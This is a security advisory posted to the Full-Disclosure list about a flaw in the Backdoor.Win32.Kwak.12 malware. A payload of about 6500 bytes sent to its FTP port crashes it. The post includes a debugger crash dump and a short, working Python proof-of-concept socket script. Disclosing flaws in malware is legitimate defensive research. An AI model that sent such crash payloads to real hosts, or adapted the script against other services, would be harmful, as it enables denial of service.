lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CAAHK0WS7tOxtuijrJBQ6b=_QfqpV_9Fsj4NJr5BiYzgY_-WwVA@mail.gmail.com>
Date: Thu, 25 Mar 2021 23:51:26 -0400
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Backdoor.Win32.Kwak.12 / Remote Denial of Service

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source:
https://malvuln.com/advisory/c25393545e5ead3a35996ef9a887bd34_C.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Kwak.12
Vulnerability: Remote Denial of Service
Description: The backdoor runs an FTP server that listens on TCP port
37885. Attackers who can reach the infected host can send a payload of
around 6500 bytes using socket program to cause an unknown internal
exception to crash the malware.
Type: PE32
MD5: c25393545e5ead3a35996ef9a887bd34
Vuln ID: MVID-2021-0146
Dropped files:
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 03/25/2021

Memory Dump:
(d30.1084): Unknown exception - code 0eedfade (first/second chance not
available)
eax=0019fd18 ebx=03fa4458 ecx=00000007 edx=00000000 esi=03fa3af0
edi=03fa49b0
eip=75eb08f2 esp=0019fd18 ebp=0019fd70 iopl=0         nv up ei pl nz ac pe
nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00000216
KERNELBASE!RaiseException+0x62:
75eb08f2 8b4c2454        mov     ecx,dword ptr [esp+54h]
ss:002b:0019fd6c=af5cfeac


0:000> !analyze -v
*******************************************************************************
*
  *
*                        Exception Analysis
  *
*
  *
*******************************************************************************


FAULTING_IP:
KERNELBASE!RaiseException+62
75eb08f2 8b4c2454        mov     ecx,dword ptr [esp+54h]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 75eb08f2 (KERNELBASE!RaiseException+0x00000062)
   ExceptionCode: 0eedfade
  ExceptionFlags: 00000001
NumberParameters: 7
   Parameter[0]: 004151a2
   Parameter[1]: 03fa6724
   Parameter[2]: 03fa4458
   Parameter[3]: 03fa3af0
   Parameter[4]: 03fa49b0
   Parameter[5]: 0019fdac
   Parameter[6]: 0019fda4

DEFAULT_BUCKET_ID:  DELPHI_EXCEPTION

PROCESS_NAME:  Backdoor.Win32.Kwak.12.c25393545e5ead3a35996ef9a887bd34.exe

ERROR_CODE: (NTSTATUS) 0xeedfade - <Unable to get error code text>

EXCEPTION_CODE: (Win32) 0xeedfade (250477278) - <Unable to get error code
text>

EXCEPTION_PARAMETER1:  004151a2

EXCEPTION_PARAMETER2:  03fa6724

EXCEPTION_PARAMETER3:  03fa4458

EXCEPTION_PARAMETER4: 3fa3af0

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAULTING_THREAD:  00001084

PRIMARY_PROBLEM_CLASS:  DELPHI_EXCEPTION

BUGCHECK_STR:  APPLICATION_FAULT_DELPHI_EXCEPTION

LAST_CONTROL_TRANSFER:  from 004490f9 to 75eb08f2

STACK_TEXT:
0019fdbc 004490f9 03fa3af0 03fa234c 03fa3af0 KERNELBASE!RaiseException+0x62
WARNING: Stack unwind information not available. Following frames may be
wrong.
0019fdf0 004490f9 03fa234c 03fa234c 03fa234c
Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x333d1
0019fe6c 004017fa 0019ff01 0019feac 00455c3f
Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x333d1
0019fea0 004017a5 03fa1fd0 0019ff70 00455c3f
Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!_GetExceptDLLinfo+0x7a1
0019fed4 004490f9 0046119e 0044c754 00428d70
Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!_GetExceptDLLinfo+0x74c
0019ff04 0045b8cf 00000000 00461330 00000000
Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x333d1
0019ff2c 0045b91e 004674e4 00000001 00000000
Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x45ba7
0019ff50 0045ac48 00000000 00000000 00000000
Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x45bf6
0019ff64 0045baf4 00000000 0019ffcc 0045688c
Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x44f20
0019ff80 76198654 002b8000 76198630 c91b9631
Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x45dcc
0019ff94 77104a77 002b8000 3d0540e2 00000000
kernel32!BaseThreadInitThunk+0x24
0019ffdc 77104a47 ffffffff 77129eb7 00000000 ntdll!__RtlUserThreadStart+0x2f
0019ffec 00000000 00483060 002b8000 00000000 ntdll!_RtlUserThreadStart+0x1b


STACK_COMMAND:  ~0s; .ecxr ; kb

FOLLOWUP_IP:
Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+333d1
004490f9 8b5e10          mov     ebx,dword ptr [esi+10h]

SYMBOL_STACK_INDEX:  1

SYMBOL_NAME:  backdoor_win32_kwak_12!Ftpsrvcinitialization$qqrv+333d1

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34

IMAGE_NAME:  Backdoor.Win32.Kwak.12.c25393545e5ead3a35996ef9a887bd34.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  39a61aec

BUCKET_ID:
 APPLICATION_FAULT_DELPHI_EXCEPTION_backdoor_win32_kwak_12!Ftpsrvcinitialization$qqrv+333d1

FAILURE_BUCKET_ID:
 DELPHI_EXCEPTION_eedfade_Backdoor.Win32.Kwak.12.c25393545e5ead3a35996ef9a887bd34.exe!Ftpsrvcinitialization$qqrv



Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=37885

def doit():

    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    PAYLOAD="A"*6500
    s.send(PAYLOAD)
    s.close()

    print("Backdoor.Win32.Kwak.12 /  Remote Denial of Service")
    print("MD5: c25393545e5ead3a35996ef9a887bd34")
    print("By Malvuln")


if __name__=="__main__":
    doit()


Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ